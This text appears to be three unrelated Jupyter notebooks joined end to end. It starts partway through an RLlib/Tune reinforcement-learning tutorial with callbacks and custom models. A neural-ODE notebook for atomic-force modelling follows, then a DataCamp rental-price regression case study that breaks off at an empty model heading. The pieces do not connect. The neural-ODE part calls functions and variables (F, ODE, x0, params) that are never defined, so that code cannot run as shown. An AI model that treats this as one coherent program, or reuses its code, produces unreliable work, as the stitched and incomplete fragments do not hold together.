# hyperparam trials and experiment runs on a cluster.
from ray import tune
# Running stuff with tune, we can re-use the exact
# same config that we used when working with RLlib directly!
tune_config = config.copy()
# Let's add our first hyperparameter search via our config.
# How about we try two different learning rates? Let's say 0.00005 and 0.5 (ouch!).
tune_config["lr"] = tune.grid_search([0.00005, 0.5]) # <- 0.5? again: ouch!
tune_config["train_batch_size"] = tune.grid_search([3000, 4000])
# Now that we will run things "automatically" through tune, we have to
# define one or more stopping criteria.
# Tune will stop the run, once any single one of the criteria is matched (not all of them!).
stop = {
# Note that the keys used here can be anything present in the above `rllib_trainer.train()` output dict.
"training_iteration": 5,
"episode_reward_mean": 20.0,
}
# "PPO" is a registered name that points to RLlib's PPOTrainer.
# See `ray/rllib/agents/registry.py`
# Run a simple experiment until one of the stopping criteria is met.
analysis = tune.run(
"PPO",
config=tune_config,
stop=stop,
# Note that no trainers will be returned from this call here.
# Tune will create n Trainers internally, run them in parallel and destroy them at the end.
# However, you can ...
checkpoint_at_end=True, # ... create a checkpoint when done.
checkpoint_freq=10, # ... create a checkpoint every 10 training iterations.
)
```
### Why did we use 6 CPUs in the tune run above (3 CPUs per trial)?
PPO - by default - uses 2 "rollout" workers (`num_workers=2`). These are Ray Actors that have their own environment copy(ies) and step through those in parallel. On top of these two "rollout" workers, every Trainer in RLlib always also has a "local" worker, which - in case of PPO - handles the learning updates. This gives us 3 workers (2 rollout + 1 local learner), which require 3 CPUs.
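Spelled out as a quick sanity check (plain Python; the numbers below are assumptions based on PPO's defaults described above and on two trials running concurrently):

```python
def cpus_per_trial(num_workers):
    # Each trial needs its rollout workers plus one local (learner) worker.
    return num_workers + 1

num_workers = 2        # PPO's default number of rollout workers
concurrent_trials = 2  # e.g. how many of the 4 grid-search trials fit at once
total_cpus = concurrent_trials * cpus_per_trial(num_workers)
print(total_cpus)  # 6
```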
## Exercise No 2
<hr />
Using the `tune_config` that we have built so far, let's run another `tune.run()`, but apply the following changes to our setup this time:
- Set up only 1 learning rate under the "lr" config key. Choose the (seemingly) best value from the run in the previous cell (the one that yielded the highest avg. reward).
- Set up only 1 train batch size under the "train_batch_size" config key. Choose the (seemingly) best value from the run in the previous cell (the one that yielded the highest avg. reward).
- Set `num_workers` to 5, which will allow us to run more environment "rollouts" in parallel and to collect training batches more quickly.
- Set the `num_envs_per_worker` config parameter to 5. This will clone our env on each rollout worker, and thus parallelize action computing forward passes through our neural networks.
Other than that, use the exact same args as in our `tune.run()` call in the previous cell.
**Good luck! :)**
```
# !LIVE CODING!
# Solution to Exercise #2
# Run for longer this time (up to 180 iterations) and try to reach 60.0 reward (sum of both agents).
stop = {
"training_iteration": 180, # we have the 15min break now to run this many iterations
"episode_reward_mean": 60.0, # sum of both agents' rewards. Probably won't reach it, but we should try nevertheless :)
}
# tune_config.update({
# ???
# })
# analysis = tune.run(...)
```
------------------
## 15 min break :)
------------------
(while the above experiment is running (and hopefully learning))
## How do we extract any checkpoint from a trial of a tune.run?
```
# The previous tune.run (the one we did before the exercise) returned an Analysis object, from which we can access any checkpoint
# (given we set checkpoint_freq or checkpoint_at_end to reasonable values) like so:
print(analysis)
# Get all trials (we only have one).
trials = analysis.trials
# Assuming the first trial was the best, we'd like to extract this trial's best checkpoint:
best_checkpoint = analysis.get_best_checkpoint(trial=trials[0], metric="episode_reward_mean", mode="max")
print(f"Found best checkpoint for trial #2: {best_checkpoint}")
# Undo the grid-search config, which RLlib doesn't understand.
rllib_config = tune_config.copy()
rllib_config["lr"] = 0.00005
rllib_config["train_batch_size"] = 4000
# Restore a RLlib Trainer from the checkpoint.
new_trainer = PPOTrainer(config=rllib_config)
new_trainer.restore(best_checkpoint)
new_trainer
out = Output()
display.display(out)
with out:
obs = env.reset()
while True:
a1 = new_trainer.compute_action(obs["agent1"], policy_id="policy1")
a2 = new_trainer.compute_action(obs["agent2"], policy_id="policy2")
actions = {"agent1": a1, "agent2": a2}
obs, rewards, dones, _ = env.step(actions)
out.clear_output(wait=True)
env.render()
time.sleep(0.07)
if dones["agent1"] is True:
break
```
## Let's talk about customization options
### Deep Dive: How do we customize RLlib's RL loop?
RLlib offers a callbacks API that allows you to add custom behavior to
all major events during the environment sampling- and learning process.
**Our problem:** So far, we can only see standard stats, such as rewards, episode lengths, etc.
Sometimes these do not give us enough insight into important questions, such as: How many times
have the two agents collided? Or how many times has agent1 discovered a new field?
In the following cell, we will create custom callback "hooks" that will allow us to
add these stats to the returned metrics dict, and which will therefore be displayed in tensorboard!
For that we will override RLlib's DefaultCallbacks class and implement the
`on_episode_start`, `on_episode_step`, and `on_episode_end` methods therein:
```
# Override the DefaultCallbacks with your own and implement any methods (hooks)
# that you need.
from ray.rllib.agents.callbacks import DefaultCallbacks
from ray.rllib.evaluation.episode import MultiAgentEpisode
class MyCallbacks(DefaultCallbacks):
def on_episode_start(self,
*,
worker,
base_env,
policies,
episode: MultiAgentEpisode,
env_index,
**kwargs):
# We will use the `MultiAgentEpisode` object being passed into
# all episode-related callbacks. It comes with a user_data property (dict),
# which we can write arbitrary data into.
# At the end of an episode, we'll transfer that data into the `hist_data`, and `custom_metrics`
# properties to make sure our custom data is displayed in TensorBoard.
# The episode is starting:
# Set per-episode counter capturing how many new fields (states)
# agent1 has discovered.
episode.user_data["new_fields_discovered"] = 0
# Set per-episode collision counter (how many times have the two agents collided?).
episode.user_data["num_collisions"] = 0
def on_episode_step(self,
*,
worker,
base_env,
episode: MultiAgentEpisode,
env_index,
**kwargs):
# Get both rewards.
ag1_r = episode.prev_reward_for("agent1")
ag2_r = episode.prev_reward_for("agent2")
# Agent1 discovered a new field.
if ag1_r == 1.0:
episode.user_data["new_fields_discovered"] += 1
# Collision.
elif ag2_r == 1.0:
episode.user_data["num_collisions"] += 1
def on_episode_end(self,
*,
worker,
base_env,
policies,
episode: MultiAgentEpisode,
env_index,
**kwargs):
# Episode is done:
# Write scalar values (sum over rewards) to `custom_metrics` and
# time-series data (rewards per time step) to `hist_data`.
# Both will be visible then in TensorBoard.
episode.custom_metrics["new_fields_discovered"] = episode.user_data["new_fields_discovered"]
episode.custom_metrics["num_collisions"] = episode.user_data["num_collisions"]
# Setting up our config to point to our new custom callbacks class:
config = {
"env": MultiAgentArena,
"callbacks": MyCallbacks, # by default, this would point to `rllib.agents.callbacks.DefaultCallbacks`, which does nothing.
"num_workers": 5, # we know now: this speeds up things!
}
tune.run(
"PPO",
config=config,
stop={"training_iteration": 20},
checkpoint_at_end=True,
# If you'd like to restore the tune run from an existing checkpoint file, you can do the following:
#restore="/Users/sven/ray_results/PPO/PPO_MultiAgentArena_fd451_00000_0_2021-05-25_15-13-26/checkpoint_000010/checkpoint-10",
)
```
### Let's check tensorboard for the new custom metrics!
1. Head over to the Anyscale project view and click on the "TensorBoard" button:
<img src="images/tensorboard_button.png" width=1000>
Alternatively - if you ran this locally on your own machine:
1. Head over to ~/ray_results/PPO/PPO_MultiAgentArena_[some key]_00000_0_[date]_[time]/
1. In that directory, you should see a `event.out....` file.
1. Run `tensorboard --logdir .` and head to http://localhost:6006
<img src="images/tensorboard.png" width=800>
### Deep Dive: Writing custom Models in tf or torch.
```
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.framework import try_import_tf, try_import_torch
tf1, tf, tf_version = try_import_tf()
torch, nn = try_import_torch()
# Custom Neural Network Models.
class MyKerasModel(TFModelV2):
"""Custom model for policy gradient algorithms."""
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
"""Build a simple [16, 16]-MLP (+ value branch)."""
super(MyKerasModel, self).__init__(obs_space, action_space,
num_outputs, model_config, name)
# Keras Input layer.
self.inputs = tf.keras.layers.Input(
shape=obs_space.shape, name="observations")
# Hidden layer (shared by action logits outputs and value output).
layer_1 = tf.keras.layers.Dense(
16,
name="layer1",
activation=tf.nn.relu)(self.inputs)
# Action logits output.
logits = tf.keras.layers.Dense(
num_outputs,
name="out",
activation=None)(layer_1)
# "Value"-branch (single node output).
# Used by several RLlib algorithms (e.g. PPO) to calculate an observation's value.
value_out = tf.keras.layers.Dense(
1,
name="value",
activation=None)(layer_1)
# The actual Keras model:
self.base_model = tf.keras.Model(self.inputs,
[logits, value_out])
def forward(self, input_dict, state, seq_lens):
"""Custom-define your forard pass logic here."""
# Pass inputs through our 2 layers and calculate the "value"
# of the observation and store it for when `value_function` is called.
logits, self.cur_value = self.base_model(input_dict["obs"])
return logits, state
def value_function(self):
"""Implement the value branch forward pass logic here:
We will just return the already calculated `self.cur_value`.
"""
assert self.cur_value is not None, "Must call `forward()` first!"
return tf.reshape(self.cur_value, [-1])
class MyTorchModel(TorchModelV2, nn.Module):
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
"""Build a simple [16, 16]-MLP (+ value branch)."""
TorchModelV2.__init__(self, obs_space, action_space, num_outputs,
model_config, name)
nn.Module.__init__(self)
self.device = torch.device("cuda"
if torch.cuda.is_available() else "cpu")
# Hidden layer (shared by action logits outputs and value output).
self.layer_1 = nn.Linear(obs_space.shape[0], 16).to(self.device)
# Action logits output.
self.layer_out = nn.Linear(16, num_outputs).to(self.device)
# "Value"-branch (single node output).
# Used by several RLlib algorithms (e.g. PPO) to calculate an observation's value.
self.value_branch = nn.Linear(16, 1).to(self.device)
self.cur_value = None
def forward(self, input_dict, state, seq_lens):
"""Custom-define your forard pass logic here."""
# Pass inputs through our 2 layers.
layer_1_out = self.layer_1(input_dict["obs"])
logits = self.layer_out(layer_1_out)
# Calculate the "value" of the observation and store it for
# when `value_function` is called.
self.cur_value = self.value_branch(layer_1_out).squeeze(1)
return logits, state
def value_function(self):
"""Implement the value branch forward pass logic here:
We will just return the already calculated `self.cur_value`.
"""
assert self.cur_value is not None, "Must call `forward()` first!"
return self.cur_value
# Do a quick test on the custom model classes.
test_model_tf = MyKerasModel(
obs_space=gym.spaces.Box(-1.0, 1.0, (2, )),
action_space=None,
num_outputs=2,
model_config={},
name="MyModel",
)
print("TF-output={}".format(test_model_tf({"obs": np.array([[0.5, 0.5]])})))
# For PyTorch, you can do:
#test_model_torch = MyTorchModel(
# obs_space=gym.spaces.Box(-1.0, 1.0, (2, )),
# action_space=None,
# num_outputs=2,
# model_config={},
# name="MyModel",
#)
#print("Torch-output={}".format(test_model_torch({"obs": torch.from_numpy(np.array([[0.5, 0.5]], dtype=np.float32))})))
# Set up our custom model and re-run the experiment.
config.update({
"model": {
"custom_model": MyKerasModel, # for torch users: "custom_model": MyTorchModel
"custom_model_config": {
#"layers": [128, 128],
},
},
})
tune.run(
"PPO",
config=config, # for torch users: config=dict(config, **{"framework": "torch"}),
stop={
"training_iteration": 5,
},
)
```
### Deep Dive: A closer look at RLlib's components
#### (Depending on time left and amount of questions having been accumulated :)
We already took a quick look inside an RLlib Trainer object and extracted its Policy(ies) and the Policy's model (neural network). Here is a much more detailed overview of what's inside a Trainer object.
At the core is the so-called `WorkerSet` sitting under `Trainer.workers`. A WorkerSet is a group of `RolloutWorker` (`rllib.evaluation.rollout_worker.py`) objects that always consists of a "local worker" (`Trainer.workers.local_worker()`) and n "remote workers" (`Trainer.workers.remote_workers()`).
<img src="images/rllib_structure.png" width=1000>
### Scaling RLlib
Scaling RLlib works by parallelizing the "jobs" that the remote `RolloutWorkers` do. In a vanilla RL algorithm, like PPO, DQN, and many others, the `@ray.remote` labeled RolloutWorkers in the figure above are responsible for interacting with one or more environments and thereby collecting experiences. Observations are produced by the environment, actions are then computed by the Policy(ies) copy located on the remote worker and sent to the environment in order to produce yet another observation. This cycle is repeated endlessly and only sometimes interrupted to send experience batches ("train batches") of a certain size to the "local worker". There these batches are used to call `Policy.learn_on_batch()`, which performs a loss calculation, followed by a model weights update, and a subsequent weights broadcast back to all the remote workers.
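The sample / learn / broadcast cycle described above can be sketched with tiny stand-in classes (purely illustrative: `Worker` below is NOT RLlib's `RolloutWorker`, and the "batches" and "weights" are fakes):

```python
# Illustrative sketch of the cycle: remote workers sample, the local
# worker learns on the concatenated batch, then weights are broadcast back.
class Worker:
    def __init__(self):
        self.weights = 0
    def sample(self):
        return [1, 2, 3]                   # fake experience batch
    def learn_on_batch(self, batch):
        self.weights += 1                  # fake gradient update
        return {"num_samples": len(batch)}
    def get_weights(self):
        return self.weights
    def set_weights(self, w):
        self.weights = w

local = Worker()
remotes = [Worker() for _ in range(2)]

# 1) Remote rollout workers collect experiences (in RLlib: in parallel, via ray.remote).
train_batch = [s for w in remotes for s in w.sample()]
# 2) The local worker performs the learning update.
info = local.learn_on_batch(train_batch)
# 3) The updated weights are broadcast back to all remote workers.
for w in remotes:
    w.set_weights(local.get_weights())
print(info["num_samples"])  # 6
```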
## Time for Q&A
...
## Thank you for listening and participating!
### Here are a couple of links that you may find useful.
- The <a href="https://github.com/sven1977/rllib_tutorials.git">github repo of this tutorial</a>.
- <a href="https://docs.ray.io/en/master/rllib.html">RLlib's documentation main page</a>.
- <a href="http://discuss.ray.io">Our discourse forum</a> to ask questions on Ray and its libraries.
- Our <a href="https://forms.gle/9TSdDYUgxYs8SA9e8">Slack channel</a> for interacting with other Ray RLlib users.
- The <a href="https://github.com/ray-project/ray/blob/master/rllib/examples/">RLlib examples scripts folder</a> with tons of examples on how to do different stuff with RLlib.
- A <a href="https://medium.com/distributed-computing-with-ray/reinforcement-learning-with-rllib-in-the-unity-game-engine-1a98080a7c0d">blog post on training with RLlib inside a Unity3D environment</a>.
```
import numpy as np
from scipy.integrate import solve_ivp
import matplotlib.pyplot as plt
from cp_detection.NeuralODE import GeneralModeDataset, LightningTrainer, TrainModel, LoadModel
from cp_detection.ForceSimulation import ForcedHarmonicOscillator, DMT_Maugis, SimulateGeneralMode
DMT = DMT_Maugis(0.2, 10, 2, 130, 1, 0.3, 0.3)
ode_params = {'Q':12000, 'A0':0.5, 'Om':1., 'k':1000}
FHO = ForcedHarmonicOscillator(**ode_params, Fint = DMT.F)
d_array = np.linspace(1, 10, 20)
t, z_array = SimulateGeneralMode(FHO, d_array, 0.1, 1000, rtol = 1e-7)
z_array.shape
_, ax = plt.subplots(1, 1, figsize = (16, 5))
ax.plot(t[-1000:], z_array[0,:], 'k')
ax.grid(ls = '--')
#ax.axvline(x = 10*ode_params['Q'], color = 'r')
import json
savepath = './Data/digital.json'
savedata = {'ode_params':ode_params, 'd_array': d_array.tolist(), 'z_array': z_array.tolist(), 't' : t.tolist()}
with open(savepath, 'w') as savefile:
json.dump(savedata, savefile)
savepath = './Data/digital.json'
train_dataset = GeneralModeDataset.load(savepath)
import torch
if torch.cuda.is_available():
device = torch.device("cuda")
print("GPU is available")
else:
device = torch.device("cpu")
print("GPU not available, CPU used")
from argparse import Namespace
hparams = Namespace(**{'train_dataset': train_dataset, 'hidden_nodes': [20, 20, 20], 'lr': 0.02, 'batch_size': 20, 'solver': 'dopri5'})
model = LightningTrainer(hparams)
import os
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
checkpoint_callback = ModelCheckpoint(filepath = './checkpoints', save_best_only = True, verbose = True, monitor = 'loss', mode = 'min', prefix = '')
trainer = Trainer(gpus = 1, early_stop_callback = None, checkpoint_callback = checkpoint_callback, show_progress_bar = True, max_nb_epochs=10000)
trainer.fit(model)
```
## Load trained model, evaluate results
```
checkpoint_path = './hall_of_fame/20200206/_ckpt_epoch_1256.ckpt'
model = LoadModel(checkpoint_path)
d = np.linspace(3.0, 10.0, 40)
model.cuda()
F_pred = model.predict_force(d)
fig, ax = plt.subplots(1, 1, figsize = (7, 5))
ax.plot(d, F_pred, '.r', label = 'NN prediction')
ax.plot(d, F(d), '.k', label = 'True Force')
ax.legend()
ax.grid(ls = '--')
sol = solve_ivp(ODE, (0, 50), x0, t_eval = np.linspace(0, 50, 1000))
data = sol.y[1,:] + np.random.normal(scale = 0.3, size = sol.y[1,:].shape)
fig, axes = plt.subplots(1, 2, figsize = (16, 5))
axes[0].plot(sol.t, sol.y[1,:], '.k')
axes[1].plot(sol.t, data, '.k')
for ax in axes:
ax.grid(ls = '--')
import torch
import torch.nn as nn
from torch.utils.data import TensorDataset, DataLoader
from torchdiffeq import odeint_adjoint as odeint
from torchviz import make_dot, make_dot_from_trace
class Fint(nn.Module):
def __init__(self, ndense):
super(Fint, self).__init__()
self.elu = nn.ELU()
self.tanh = nn.Tanh()
self.fc1 = nn.Linear(1, ndense)
self.fc2 = nn.Linear(ndense, ndense)
self.fc3 = nn.Linear(ndense, 1)
def forward(self, x):
out = self.fc1(x)
out = self.elu(out)
out = self.fc2(out)
out = self.elu(out)
out = self.fc2(out)
out = self.elu(out)
out = self.fc3(out)
out = self.tanh(out)
return out
class NN_ODE(nn.Module):
def __init__(self, ndense, Q, A0, Om, k, d):
super(NN_ODE, self).__init__()
self.F = Fint(ndense)
self.Q = Q
self.A0 = A0
self.Om = Om
self.k = k
self.d = d
self.nfe = 0
self.B = torch.tensor([[-1./self.Q, -1.], [1., 0.]], device = device)
self.C = torch.tensor([1.,0.], device = device)
def forward(self, t, x):
self.nfe+=1
F = self.F(x[1].unsqueeze(-1))
#ode = torch.matmul(self.B, x) + (self.d + self.A0*torch.cos(self.Om*t)/self.Q + F/self.k) * self.C
ode = torch.matmul(self.B, x) + (self.d + self.A0*torch.cos(self.Om*t)/self.Q + F) * self.C
# Currently, force term is self.k times larger
return ode
nnode = NN_ODE(4, **params)
nnode.float()
nnode.cuda()
nnode.parameters
optimizer = torch.optim.Adam(nnode.parameters(), lr = 0.01)
loss_function = nn.MSELoss()
x0_tensor = torch.from_numpy(x0).cuda(non_blocking = True).float()
t_samp = torch.from_numpy(sol.t).cuda(non_blocking = True).float()
data = torch.from_numpy(data).cuda(non_blocking = True).float()
data_fft = torch.rfft(data, 1, onesided = True)
data_amp = torch.sum(data_fft**2, dim = -1)
data_logamp = torch.log1p(data_amp)
print(data_logamp.size())
logamp_array = data_logamp.cpu().detach().numpy()
plt.plot(logamp_array[0:50])
x_pred = odeint(nnode, x0_tensor, t_samp)
z_pred = x_pred[:,1]
z_fft = torch.rfft(z_pred, 1)
z_amp = torch.sum(z_fft**2, dim = -1)
z_logamp = torch.log1p(z_amp)
z_logamp.size()
loss = loss_function(z_logamp, data_logamp)
zlogamp_array = z_logamp.cpu().detach().numpy()
plt.plot(zlogamp_array[0:50])
make_dot(loss, params=dict(nnode.named_parameters()))
N_epochs = 500
history = np.zeros((N_epochs, 1))
for epoch in range(N_epochs):
# zero the parameter gradients
optimizer.zero_grad()
running_loss = 0.0
solut = odeint(nnode, x0_tensor, t_samp, method = 'adams')
z_pred = solut[:,1]
z_fft = torch.rfft(z_pred, 1)
z_amp = torch.sum(z_fft**2, dim = -1)
#z_fft = torch.rfft(z_pred, 1)
z_logamp = torch.log1p(z_amp)
#z_logamp.size()
loss = loss_function(z_logamp, data_logamp)
#loss = loss_function(z_amp, data_amp)
#loss = loss_function(z_pred, data)
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
print('[%d] loss: %.12e' %(epoch + 1, running_loss))
history[epoch] = running_loss
print('Training Finished')
fig, ax = plt.subplots(1, 1, figsize = (7, 5))
ax.plot(history)
ax.set_yscale('log')
ax.grid(ls = '--')
ax.set_title('Learning Curve', fontsize = 14)
sol = odeint(nnode, x0_tensor, t_samp)
z_final = sol[:,1].cpu().detach().numpy()
t = t_samp.cpu().detach().numpy()
z_true = data.cpu().detach().numpy()
fig, ax = plt.subplots(1, 1, figsize = (7, 5))
ax.plot(t, z_true, '.k', label = 'Data')
ax.plot(t, z_final, '.r', label = 'Prediction')
ax.legend()
ax.grid(ls = '--')
d_array = np.linspace(1, 8, 1000)
d_tensor = torch.from_numpy(d_array).cuda(non_blocking = True).float()
F_true = F(d_array)
F_pred = np.zeros(d_array.shape)
for i in range(len(F_pred)):
F_pred[i] = nnode.F(d_tensor[i].unsqueeze(-1)).cpu().detach().numpy()
fig, ax = plt.subplots(1, 1, figsize = (7, 5))
ax.plot(d_array, F_true, '.k', label = 'True Force')
ax.plot(d_array, F_pred, '.r', label = 'NN Prediction')
ax.axhline(F_true.mean())
ax.legend()
ax.grid(ls = '--')
F_pred
```
# DataCamp Certification Case Study
### Project Brief
A housing rental company has hired you for a new project. They are interested in developing an application to help people estimate the money they could earn renting out their living space.
The company has provided you with a dataset that includes details about each property rented, as well as the price charged per night. They want to avoid estimating prices that are more than 25 dollars off of the actual price, as this may discourage people.
You will need to present your findings to the head of rentals, who has no technical data science background.
The data you will use for this analysis can be accessed here: `"data/rentals.csv"`
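Since the brief sets a concrete $25 tolerance, a small evaluation helper along these lines could be used to report how often a model meets it (a sketch; the arrays passed in below are illustrative, not the rentals data):

```python
import numpy as np

def within_tolerance(y_true, y_pred, tol=25.0):
    """Fraction of predictions within `tol` dollars of the actual price."""
    diffs = np.abs(np.asarray(y_true, dtype=float) - np.asarray(y_pred, dtype=float))
    return float(np.mean(diffs <= tol))

# Two of three illustrative predictions are within $25 of the actual price.
print(within_tolerance([100, 200, 300], [110, 240, 290]))  # 0.666...
```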
```
import pandas as pd
import numpy as np
import re
import matplotlib.pyplot as plt
import plotly.express as px
import seaborn as sns
```
## I'M GOING TO USE THE MOST TYPICAL DATA SCIENCE PIPELINE. IT HAS 5 STEPS
## 1.Obtaining the data
## 2.Cleaning the data
## 3.Exploring and visualising the data
## 4.Modelling the data
## 5.Interpreting the data
# 1.OBTAINING THE DATA
```
#reading the data into dataframe
df = pd.read_csv('./data/rentals.csv')
df.head()
#No of rows and columns in the dataframe
df.shape
```
# 2.CLEANING THE DATA
```
#checking if there are any null values
df.isna().sum()
```
Now we can see there are 12 null values in "bathrooms" and 4 null values in "bedrooms"
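Dropping these rows (done in the next cell) is the simplest option; an alternative worth noting is median imputation, sketched here on a toy frame standing in for the rentals data:

```python
import pandas as pd

# Toy stand-in for the rentals DataFrame with a few missing values.
df = pd.DataFrame({"bathrooms": [1.0, None, 2.0], "bedrooms": [2.0, 3.0, None]})
for col in ["bathrooms", "bedrooms"]:
    df[col] = df[col].fillna(df[col].median())  # fill nulls with the column median
print(df.isna().sum().sum())  # 0
```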
```
#dropping the null values
df.dropna(inplace=True)
df.isna().sum()
#checking the shape of the dataframe after dropping null values
df.shape
df.dtypes
#Now we change the datatype of column "price" from object to float64 using regular expression
df['price'] = df['price'].apply(lambda x: float(re.sub(r'\,|\$', '', x)))
# we don't need the "id" column; it carries no predictive information
df.drop(columns=['id'], inplace=True)
```
# 3A.EXPLORING THE DATA
```
# we want to explore every column of data and check what we need for our case study and rest can be dropped from the data
df.property_type.unique()
_ = pd.DataFrame([
df.property_type.value_counts(),
round(df.property_type.value_counts(1) * 100, 2)
], ).T
_.columns = ['count', 'percentage']
_
```
### Property types with fewer than 25 listings can be dropped; hotels, resorts, and the like should also be dropped (given our case study)
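Instead of the hand-written `drop_list` below, the rare property types could also be selected programmatically (a sketch; the toy frame stands in for the rentals data):

```python
import pandas as pd

# Toy stand-in: one common property type, one rare one.
df = pd.DataFrame({"property_type": ["Apartment"] * 30 + ["Castle"] * 3})
counts = df["property_type"].value_counts()
rare_types = counts[counts < 25].index               # types with fewer than 25 listings
df = df[~df["property_type"].isin(rare_types)]
print(df["property_type"].unique())                  # ['Apartment']
```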
```
drop_list = [
'Bed and breakfast', 'Hostel', 'Guesthouse', 'Serviced apartment',
'Aparthotel', 'Other', 'Bungalow', 'Hotel', 'Boutique hotel',
'Resort', 'Cottage', 'Villa', 'Castle', 'Cabin',
'Tiny house', 'Earth house', 'Camper/RV', 'In-law', 'Hut', 'Dome house'
]
df = df[~df['property_type'].isin(drop_list)]
df.shape
df.property_type.unique()
df.room_type.unique()
_ = pd.DataFrame([
df.room_type.value_counts(),
round(df.room_type.value_counts(1) * 100, 2)
]).T
_.columns = ['count', 'percentage']
_
df=df[~df.room_type.eq('Entire home/apt')]
df.room_type.unique()
df.bathrooms.unique()
df[df['bathrooms']>5]
df.bedrooms.unique()
df[df['bedrooms']>4]
```
### Removal of Outlier
```
df.price.value_counts(bins=10)
before_removal= df.shape[0]
def find_outliers_IQR(data):
"""
Use Tukey's Method of outlier removal AKA InterQuartile-Range Rule
and return boolean series where True indicates it is an outlier.
- Calculates the range between the 75% and 25% quartiles
- Outliers fall outside the upper and lower limits, using a threshold of 1.5*IQR beyond the 75% and 25% quartiles.
IQR Range Calculation:
res = df.describe()
IQR = res['75%'] - res['25%']
lower_limit = res['25%'] - 1.5*IQR
upper_limit = res['75%'] + 1.5*IQR
Args:
data (Series,or ndarray): data to test for outliers.
Returns:
[boolean Series]: A True/False for each row use to slice outliers.
EXAMPLE USE:
>> idx_outs = find_outliers_IQR(df['AdjustedCompensation'])
>> good_data = df[~idx_outs].copy()
"""
df_b = data
res = df_b.describe()
IQR = res['75%'] - res['25%']
lower_limit = res['25%'] - 1.5 * IQR
upper_limit = res['75%'] + 1.5 * IQR
idx_outs = (df_b > upper_limit) | (df_b < lower_limit)
return idx_outs
df = df[~find_outliers_IQR(df.price)]
after_removal = df.shape[0]
data_loss = round(((before_removal - after_removal) / before_removal) * 100, 2)
print(data_loss)  # percentage of rows removed
df = df[~find_outliers_IQR(df.minimum_nights)]
def describe_dataframe(df: pd.DataFrame):
"""Statistical description of the pandas.DataFrame."""
left = df.describe(include='all').round(2).T
right = pd.DataFrame(df.dtypes)
right.columns = ['dtype']
ret_df = pd.merge(left=left,
right=right,
left_index=True,
right_index=True)
na_df = pd.DataFrame(df.isna().sum())
na_df.columns = ['nulls']
ret_df = pd.merge(left=ret_df,
right=na_df,
left_index=True,
right_index=True)
ret_df.fillna('', inplace=True)
return ret_df
describe_dataframe(df)
df[df.minimum_nights>365]
#dropping properties that rents more than one year.
df = df[df.minimum_nights<=365]
df.head()
```
# 3B.VISUALISING THE DATA
```
sns.lmplot(x='bedrooms', y='price',data=df, scatter_kws={
"s": 8,
"color": 'silver'
},
line_kws={
'lw': 3,
'color': 'gold'
})
plt.xlabel("Bedrooms")
plt.ylabel("House Price")
plt.title("Bedrooms vs. Rent Price")
plt.show()
sns.lmplot(x='bathrooms', y='price',data=df)
plt.xlabel("bathrooms")
plt.ylabel("House Price")
plt.title("bathrooms vs. Rent Price")
plt.show()
sns.barplot(x='room_type', y='price',data=df)
plt.xlabel("room_type")
plt.ylabel("House Price")
plt.title("room_type vs. Rent Price")
plt.show()
def heatmap_of_features_correlation(df, annot_format='.1f'):
"""
Return a masked heatmap of the given DataFrame
Parameters:
===========
df = pandas.DataFrame object.
annot_format = str, for formatting; default: '.1f'
Example of `annot_format`:
--------------------------
.1e = scientific notation with 1 decimal point (standard form)
.2f = 2 decimal places
.3g = 3 significant figures
.4% = percentage with 4 decimal places
Note:
=====
Rounding error can happen if '.1f' is used.
"""
with plt.style.context('dark_background'):
plt.figure(figsize=(10, 10), facecolor='k')
mask = np.triu(np.ones_like(df.corr(), dtype=bool))
cmap = sns.diverging_palette(3, 3, as_cmap=True)
ax = sns.heatmap(df.corr(),
mask=mask,
cmap=cmap,
annot=True,
fmt=annot_format,
linecolor='k',
annot_kws={"size": 9},
square=True,
linewidths=.5,
cbar_kws={"shrink": .5})
plt.title(f'Features heatmap', fontdict={"size": 20})
plt.show()
return ax
def drop_features_based_on_correlation(df, threshold=0.75):
"""
Returns features with high collinearity.
Parameters:
===========
df = pandas.DataFrame; no default.
data to work on.
threshold = float; default: .75.
Cut off value of check of collinearity.
"""
# Set of all the names of correlated columns
feature_corr = set()
corr_matrix = df.corr()
for i in range(len(corr_matrix.columns)):
for j in range(i):
# absolute coeff value
if abs(corr_matrix.iloc[i, j]) > threshold:
# getting the name of column
colname = corr_matrix.columns[i]
feature_corr.add(colname)
if not feature_corr:
print(f'No multicollinearity detected at {threshold*100}% threshold.')
else:
return list(feature_corr)
heatmap_of_features_correlation(df)
drop_features_based_on_correlation(df)
```
### Train and Test split
```
X = df.drop(columns='price').copy()
y = df.price.copy()
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=.8)
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder, MinMaxScaler, StandardScaler, RobustScaler
from sklearn.compose import ColumnTransformer
# isolating numerical cols
nume_col = list(X.select_dtypes('number').columns)
# isolating categorical cols
cate_col = list(X.select_dtypes('object').columns)
# pipeline for processing categorical features
pipe_cate = Pipeline([('ohe', OneHotEncoder(sparse=False, drop=None))])
# pipeline for processing numerical features
pipe_nume = Pipeline([('scaler', StandardScaler())])
# transformer
preprocessor = ColumnTransformer([('nume_feat', pipe_nume, nume_col),
('cate_feat', pipe_cate, cate_col)])
# creating dataframes
# X_train
X_train_pr = pd.DataFrame(preprocessor.fit_transform(X_train),
columns=nume_col +
list(preprocessor.named_transformers_['cate_feat'].
named_steps['ohe'].get_feature_names(cate_col)))
# X_test
X_test_pr = pd.DataFrame(preprocessor.transform(X_test),
columns=nume_col +
list(preprocessor.named_transformers_['cate_feat'].
named_steps['ohe'].get_feature_names(cate_col)))
X_train_pr
y_train
```
# 4.MODELLING THE DATA
### 1.DummyRegressor
```
from sklearn.dummy import DummyRegressor
from sklearn.metrics import mean_absolute_error, r2_score, mean_squared_error
dummy_regr = DummyRegressor(strategy="mean")
dummy_regr.fit(X_train_pr, y_train)
y_pred_dummy = dummy_regr.predict(X_test_pr)
print("MAE :", mean_absolute_error(y_test, y_pred_dummy))
print("r2 :", r2_score(y_test, y_pred_dummy))
```
### 2.LinearRegression
```
from sklearn.linear_model import LinearRegression
reg = LinearRegression(n_jobs=-1)
reg.fit(X_train_pr, y_train)
y_pred_reg = reg.predict(X_test_pr)
print("Coefs :\n", reg.coef_)
mae = (abs(y_test - y_pred_reg)).mean()
print("MAE :", mae)
print("r2 :", r2_score(y_test, y_pred_reg))
```
### 3.RandomForestRegressor
```
